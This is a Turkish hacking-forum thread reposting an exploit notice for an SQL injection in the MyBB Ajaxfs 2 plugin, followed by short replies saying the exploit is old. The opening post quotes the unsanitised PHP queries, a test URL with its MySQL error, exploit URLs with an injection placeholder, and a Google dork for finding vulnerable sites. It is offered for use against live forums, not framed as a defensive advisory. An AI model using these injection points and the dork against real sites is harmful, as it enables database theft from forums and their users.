İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

08-02-2014 17:44
#1
Black-Spy' - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2013
Nereden:
İstanbul
Mesajlar:
6.064
Teşekkür (Etti):
4227
Teşekkür (Aldı):
6362
Konular:
969
Ticaret:
(0) %
Kod:
###########################
*
# Mybb Ajaxfs Plugin Sql Injection vulnerability
*
###########################
*
#################################
#
#**** @@@*** @@@@@@@@@@@*** @@@@@********** @@@@@@@@@@*********** @@@* @@@@@@@
#**** @@@*** @@@@@@@@@@@*** @@@* @@******** @@@**** @@*********** @@@* @@@@@@@@ 
#**** @@@*** @@@*********** @@@*** @@****** @@@****** @@********* @@@* @@@* @@@ 
#**** @@@*** @@@*********** @@@***** @@**** @@@**** @@*********** @@@* @@@* @@@ 
#**** @@@*** @@@@@@@@@@@*** @@@****** @**** @@@@@@@@@@*********** @@@* @@@@@@
#**** @@@*** @@@@@@@@@@@*** @@@**** @@***** @@@**** @@*********** @@@* @@@@@@
#**** @@@*** @@@*********** @@@** @@******* @@@****** @@** @@@*** @@@* @@@ @@@
#**** @@@*** @@@*********** @@@ @@********* @@@**** @@**** @@@*** @@@* @@@* @@@
#**** @@@*** @@@@@@@@@@@*** @@@@@********** @@@@@@@@@@**** @@@*** @@@* @@@** @@@
#
#####################################
**
# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
**
# Author : Iranian Exploit DataBase
**
# Discovered By : IeDb
**
# Email : [email protected]* -* [email protected]
**
# Home : http://iedb.ir** -** http://iedb.ir/acc
**
# Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
**
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
**
# Security Risk : High
**
# Tested on : Linux
**
# Dork : inurl:ajaxfs.php
**
#################################
**
1)
**
**if(isset($_GET['tooltip']))
****{
****$pid=$_GET['tooltip'];
****$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
**
**
2)
**
*if(isset($_GET['usertooltip']))
****{
****$uid=$_GET['usertooltip'];
****$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
**
http://localhost/Upload/ajaxfs.php?usertooltip=1'
**
****1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
**
Google DORK : inurl:ajaxfs.php
**
**
# Exploit :
**
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
**
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
**
**
#################################
**
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
**
#################################
Kullanıcı İmzası
Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!

http://i.hizliresim.com/GkVJEb.gif

@blackspy_tht
blackspy@turkhackteam.info
ByBlueHacker ASDD Teşekkür etti.

27-08-2017 06:02
#2
S2001 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Mesajlar:
44
Teşekkür (Etti):
5
Teşekkür (Aldı):
1
Konular:
16
Ticaret:
(0) %
Ellerine sağlık
Kullanıcı İmzası
#####################################
VATANIN İÇİN YAŞA VATANIN İÇİN ÖL...
#####################################
27-08-2017 07:25
#3
mrcsrcylmz - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2017
Nereden:
kobane
Mesajlar:
196
Teşekkür (Etti):
13
Teşekkür (Aldı):
32
Konular:
19
Ticaret:
(0) %
Eski bir exploit
27-08-2017 07:26
#4
ALcatraz' - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
İstanbul
Mesajlar:
4.265
Teşekkür (Etti):
968
Teşekkür (Aldı):
1752
Konular:
1022
Ticaret:
(0) %
Alıntı:
mrcsrcylmz´isimli üyeden Alıntı Mesajı göster
Eski bir exploit
Konu 2014de açılmıs güncel olmayacaktı ya
Kullanıcı İmzası
En çok ne zoruma gidiyor biliyor musun? "Ülkem" diye kaydetmiştin beni telefonuna. Kalbimi parçalara ayırdın, hani vatan bölünmezdi?

Yokluğun bilinç altımdayken , varlığın kimin altında merak ediyorum.
27-08-2017 07:30
#5
Üyelik tarihi:
08/2017
Mesajlar:
14
Teşekkür (Etti):
6
Teşekkür (Aldı):
0
Konular:
2
Ticaret:
(0) %
eline sağlık günümüzde de halen var ama hacklenmiyor zaten o yüzden var
27-08-2017 09:22
#6
Üyelik tarihi:
06/2016
Mesajlar:
1.076
Teşekkür (Etti):
230
Teşekkür (Aldı):
314
Konular:
97
Ticaret:
(0) %
2014 teki bir konuya eline sağlık yazıp hortlatmakta ayrı bir ironi
Kullanıcı İmzası

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı